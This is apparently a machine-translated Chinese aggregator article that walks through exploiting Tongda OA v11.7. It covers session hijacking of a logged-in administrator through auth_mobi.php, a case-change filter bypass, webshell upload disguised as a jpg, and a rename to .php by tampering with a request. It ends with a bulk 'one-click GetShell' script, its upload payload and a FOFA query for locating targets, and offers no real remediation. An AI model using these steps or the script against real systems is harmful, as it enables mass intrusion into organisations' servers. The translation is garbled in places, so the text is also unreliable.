Shulou(Shulou.com)05/31 Report--

How to achieve access to OA v11.7 online user login loophole recurrence, in view of this problem, this article introduces the corresponding analysis and solutions in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Recurrence of online user login vulnerability of Tongda OA v11.7

A loophole similar to ultra vires, but in a very special way.

Visit the vulnerability page to get phpsession http://x.x.x.x/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

You can see that we have obtained the phpsession, so we can visit his background page at this time, but if the page shows RELOGIN, there is a loophole but the administrator is not online now, so we need to wait for him to be online.

Visit the background page: http://x.x.x.x/general/

View the local absolute path

Create a new attachment directory

Note here: we need to add a path to the system directory followed by webroot, but webroot will be filtered, but it doesn't check case, so we can easily bypass it by changing it to Webroot.

Add picture directory

The only thing to note here is that we need to add a system administrator to the release scope, so that it can be done. In terms of path, it is still the webroot path.

Upload Trojan horse

Then we add a file, which is our shell.

It is important to note that we need to change our Trojan to the jpg suffix, or the path cannot be viewed.

View Trojan path

At this time, remember the name of the file, the path is fixed, that is, under the file_folder/2013 is our Trojan.

Modify Trojan suffix

Go back to our previous upload page and click Edit.

Mouse over our Trojan horse, and then click rename.

We will open a new tab page, and we will use Firefox to grab the package:

First randomly change the name, click Save, and then you will intercept a post packet.

The packet format looks something like this:

NEW_FILE_NAME=166&CONTENT_ID=118&FILE_SORT=2&ATTACHMENT_ID=2925%402103_1578257970&ATTACHMENT_NAME_POSTFIX=jpg&ATTACHMENT_NAME=2.jpg&FIRST_ATTACHMENT_NAME=2&FILE_NAME_OLD=2.jpg

At this point, we need to change the ATTACHMENT_NAME_POSTFIX property to php. (note that there is a.)

Then replay the packet and you can see that the modification was successful.

Stitching Trojan horse path

You can see that we have successfully modified it.

Then find the previous file name, and then change the original file name we uploaded (2.jpg) to (166.php), which is based on the path you uploaded and the name you changed, and then if the path is still file_folder/2013, we can access our girlfriend.

One-click GetShell script

Script code:

# define payload = / mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0#define yinhao = "# define Rootre = (. *?) # define contentidre =" TableLine1 "index=" (. *?) "> # define attachmentidre = ATTACHMENT_ID_OLD" value= "(. *?)," # define shellpathre = alt= "(. *?)" Node-image-tipsfunction GetCookie (url) {res = HttpGet (url.payload, "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"); if (StrFindStr (res [1], "PHPSESSID", 0) = "- 1") {return ";} PHPSESSID= GettextMiddle (res [1]," PHPSESSID= ","; "); return PHPSESSID } function JudgeOK (url,Cookie) {res = HttpGet (url. "/ general/", Cookie); if (StrFindStr (res [0], "/ static/js/ba/agent.js", 0) = "- 1") {return "0";} else {return "1";}} function GetRoot (content) {list = StrRe (content,Rootre); num = GetArrayNum (list) Num = num/2; I = 0; while (I = 2) {return list [1];} return "";} function GetShell (url) {PHPSESSID= GetCookie (url); if (PHPSESSID= = ") {return";} Cookie = "Cookie: PHPSESSID=" .PHPSESSID. " ".StrRN ()." User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 "; if (JudgeOK (url,Cookie) = =" 1 ") {WebRoot = GetWebRoot (url,Cookie); AddPath (url,WebRoot,Cookie); AddImgPath (url,WebRoot,Cookie) ShellPost = ReadFile ("script\ Integrated vulnerability\ OAShell.txt"); PushImg (url,ShellPost,Cookie); path = GetImg (url,WebRoot,Cookie); CONTENTID = GetCONTENTID (url,Cookie); ATTACHMENTID=GetATTACHMENTID (url,CONTENTID,Cookie); ChangeImgName (url,CONTENTID,ATTACHMENTID,Cookie) Realshellpath = url. "/ file_folder/2103/" .StrReplace (path, "1.jpg", "166.php"); print ("Shell path:", realshellpath, "password: test");} else {return ";}} function main (args) {print (" Please enter the list file to be detected: ") List = StrSplit (ReadFile (input ()), StrRN ()); I = 0; num = GetArrayNum (list); while (I < num) {url= list [Toint (I)]; print ("connection currently detected: .url); GetShell (url); i=i+1 } print ("detection complete");}

OAShell.txt:

33072116513621237124579432636Content-Disposition: form-data; name= "SUBJECT" 166.jpg--33072116513621237124579432636Content-Disposition: form-data; name= "CONTENT_NO"-- 33072116513621237124579432636Content-Disposition: form-data Name= "TD_HTML_EDITOR_CONTENT"-- 33072116513621237124579432636Content-Disposition: form-data; name= "KEYWORD"-- 33072116513621237124579432636Content-Disposition: form-data; name= "NEW_NAME" μ-- 33072116513621237124579432636Content-Disposition: form-data Name= "NEW_TYPE"-33072116513621237124579432636Content-Disposition: form-data; name= "ATTACHMENT_1"; filename= "" Content-Type: application/octet-stream--33072116513621237124579432636Content-Disposition: form-data Name= "ATTACH_NAME"-33072116513621237124579432636Content-Disposition: form-data; name= "ATTACH_DIR"-33072116513621237124579432636Content-Disposition: form-data; name= "DISK_ID"-33072116513621237124579432636Content-Disposition: form-data Name= "ATTACHMENT_1000"; filename= "" Content-Type: application/octet-stream--33072116513621237124579432636Content-Disposition: form-data; name= "ATTACHMENT_DESC"-33072116513621237124579432636Content-Disposition: form-data Name= "CONTENT_ID"-33072116513621237124579432636Content-Disposition: form-data; name= "OP"-33072116513621237124579432636Content-Disposition: form-data; name= "PD" 1--33072116513621237124579432636Content-Disposition: form-data Name= "SORT_ID" 0--33072116513621237124579432636Content-Disposition: form-data; name= "ATTACHMENT_ID_OLD"-33072116513621237124579432636Content-Disposition: form-data Name= "ATTACHMENT_NAME_OLD"-33072116513621237124579432636Content-Disposition: form-data; name= "FILE_SORT" 2--33072116513621237124579432636Content-Disposition: form-data; name= "USE_CAPACITY"-33072116513621237124579432636Content-Disposition: form-data Name= "USE_CAPACITY_SIZE"-33072116513621237124579432636Content-Disposition: form-data; name= "SHARE_USER"-33072116513621237124579432636Content-Disposition: form-data; name= "ATTACHMENT_0" Filename= "1.jpg" Content-Type: image/jpeg--33072116513621237124579432636--

Take a screenshot of an example:

Attach a fofa statement:

App= "TDXK- access OA" on how to achieve access to OA v11.7 online user login vulnerability recurrence of the answer here, I hope the above content can be of some help to you, if you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.